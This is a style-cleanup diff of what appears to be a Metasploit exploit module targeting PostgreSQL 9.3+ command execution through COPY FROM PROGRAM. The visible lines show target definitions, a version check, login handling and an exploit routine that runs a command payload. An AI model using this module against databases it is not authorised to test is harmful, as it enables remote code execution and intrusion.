@@ -42,9 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] # Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
         ],
         'PayloadType' => 'cmd',
-        'Platform' => %w(linux unix win osx),
+        'Platform' => %w[linux unix win osx],
         'Payload' => {},
-        'Arch' => [ARCH_CMD],
         'Targets' => [
           [
             'Unix/OSX/Linux', {
@@ -64,12 +63,14 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ], [
             'Windows (CMD)',
-            'Platform' => 'win',
-            'Arch' => [ARCH_CMD],
-            'Payload' => {
-              'Compat' => {
-                'PayloadType' => 'cmd',
-                'RequiredCmd' => 'adduser, generic'
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_CMD],
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'adduser, generic'
+                }
               }
             }
           ],
@@ -106,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return false unless version[:auth]
 
     vprint_status version[:auth].to_s
-    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/i).flatten.first
+    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d.]+)/i).flatten.first
     Rex::Version.new(version_full) >= Rex::Version.new('9.3')
   end
 
@@ -225,21 +226,19 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def do_login(user, pass, database)
-    begin
-      password = pass || postgres_password
-      result = postgres_fingerprint(
-        db: database,
-        username: user,
-        password: password
-      )
+    password = pass || postgres_password
+    result = postgres_fingerprint(
+      db: database,
+      username: user,
+      password: password
+    )
 
-      return result[:auth] if result[:auth]
+    return result[:auth] if result[:auth]
 
-      print_error "#{peer} - Login failed"
-      return :noauth
-    rescue Rex::ConnectionError
-      return :noconn
-    end
+    print_error "#{peer} - Login failed"
+    return :noauth
+  rescue Rex::ConnectionError
+    return :noconn
   end
 
   def exploit
@@ -247,11 +246,11 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless vuln_version?
     return unless login_success?
 
-    print_status("Exploiting...")
+    print_status('Exploiting...')
     if execute_payload
-      print_status("Exploit Succeeded")
+      print_status('Exploit Succeeded')
     else
-      print_error("Exploit Failed")
+      print_error('Exploit Failed')
     end
     postgres_logout if @postgres_conn && session.blank?
   end
